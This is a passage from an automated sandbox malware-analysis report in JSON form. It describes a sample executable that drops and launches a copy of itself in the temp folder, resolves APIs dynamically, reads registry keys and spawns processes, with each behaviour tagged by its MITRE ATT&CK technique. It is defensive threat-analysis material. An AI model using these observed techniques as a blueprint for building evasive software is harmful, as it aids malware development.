\"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"14001500da590276@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"15001600c03eb76b@ADVAPI32.dll\"\n \"0e000f00703fb76b@ADVAPI32.dll\"\n \"0e000f00cc3fb76b@ADVAPI32.dll\"\n \"11001200b447b76b@ADVAPI32.dll\"\n \"110012004848b76b@ADVAPI32.dll\"\n \"120013008c48b76b@ADVAPI32.dll\"\n \"12001300e448b76b@ADVAPI32.dll\"\n \"14001500386eb76b@ADVAPI32.dll\"\n \"14001500506eb76b@ADVAPI32.dll\"\n \"14001500686eb76b@ADVAPI32.dll\"\n \"17001800806eb76b@ADVAPI32.dll\"\n \"0d000e00986eb76b@ADVAPI32.dll\"\n \"11001200a86eb76b@ADVAPI32.dll\"\n \"11001200bc6eb76b@ADVAPI32.dll\"\n \"0d000e004466b76b@WININET.dll\"\n \"0d000e00b466b76b@WININET.dll\"\n \"10001100ec66b76b@WININET.dll\"\n \"100011009067b76b@WININET.dll\"\n \"10001100006fb76b@WININET.dll\"\n \"10001100146fb76b@WININET.dll\"\n \"14001500286fb76b@WININET.dll\"\n \"14001500406fb76b@WININET.dll\"\n \"12001300586fb76b@WININET.dll\"\n \"120013006c6fb76b@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" called \"CreateProcessW\" with parameter \":*C:\\37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe *\" - (UID: 00000000-00005304)\n \"085cda53603755dc.exe\" called \"CreateProcessW\" with parameter \"a ZZZZZZTYZVG\" - (UID: 00000000-00006104)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"085cda53603755dc.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"\n \"085cda53603755dc.exe\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\" has an executable section named \".text\"\n \"085cda53603755dc.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\" has an writable section named \".data\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\" has an writable section named \".bss\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\" has an writable section named \".idata\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\" has an writable section named \".CRT\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\" has an writable section named \".tls\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\" has an writable section named \".rsrc\"\n \"085cda53603755dc.exe\" has an writable section named \".data\"\n \"085cda53603755dc.exe\" has an writable section named \".bss\"\n \"085cda53603755dc.exe\" has an writable section named \".idata\"\n \"085cda53603755dc.exe\" has an writable section named \".CRT\"\n \"085cda53603755dc.exe\" has an writable section named \".tls\"\n \"085cda53603755dc.exe\" has an writable section named \".rsrc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-127", "type": 2, "relevance": 1, "name": "Found user-agent related strings", "description": "Found string \"Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:<IPv4>) Gecko/20100722 Firefox/3.6.12\" (Indicator: \"mozilla/5.0 (\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found string \"Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:<IPv4>) Gecko/20100722 Firefox/3.6.12\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005304.00000000.173115.00481000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75920000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71670000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"KERNEL32\" at base 76330000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ca60000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75920000\n \"085cda53603755dc.exe\" loaded module \"SECUR32.DLL\" at base 757a0000\n \"085cda53603755dc.exe\" loaded module \"RPCRT4.DLL\" at base 77880000\n \"085cda53603755dc.exe\" loaded module \"SHELL32.DLL\" at base 76960000\n \"085cda53603755dc.exe\" loaded module \"PROFAPI.DLL\" at base 75a80000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 710f0000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75b40000\n \"085cda53603755dc.exe\" loaded module \"WS2_32.DLL\" at base 76080000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77880000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77880000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00006104)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00006104)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f7562 ...\" (UID: 00000000-00006104)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZTYZVG\" (UID: 00000000-00006044)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f7562 ...\" (UID: 00000000-00006104)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZTYZVG\" (UID: 00000000-00006044)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\" was detected as \"MinGW\" and name: \"Compiler\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"\n \"085cda53603755dc.exe\" was detected as \"MinGW\" and name: \"Compiler\"\n \"085cda53603755dc.exe\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-79", "relevance": 1, "name": "Contains ability to dynamically determine API calls", "description": "Found GetProcAddress() and LoadLibraryA() in an import section (Source: 37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: 085cda53603755dc.exe)", "origin": "Static Parser", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-354", "type": 2, "relevance": 1, "name": "Contains reference to mutex-related activity (API string)", "description": "Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-189", "type": 2, "relevance": 3, "name": "Contains ability to reboot/shutdown the operating system (API string)", "description": "Found reference to API \"ExitWindowsEx\" (Indicator: \"ExitWindows\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")", "origin": "File/Memory", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-455", "type": 2, "relevance": 3, "name": "Contains reference to multiple windows system processes", "description": "Found strings \"rundll32.exe,ctfmon.exe,lsass.exe,services.exe,smss.exe\" (File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")", "origin": "File/Memory", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00006044]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-481", "type": 2, "relevance": 1, "name": "Reference explorer.exe process", "description": "Found string \"explorer.exe\" (Indicator: \"explorer.exe\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"LoadLibraryW\" (Indicator: \"LoadLibrary\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"LoadLibraryW\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"LoadLibraryW\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")\n Found reference to API \"LoadLibraryW\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\version.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FLTLIB.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Secur32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" reads file \"c:\\37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to touch file \"C:\\version.DLL\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\Documents\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ui\\SwDRM.dll\"\n \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" trying to touch file \"C:\\Windows\\System32\\sechost.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"085cda53603755dc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" writes file \"%temp%\\085cda53603755dc.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 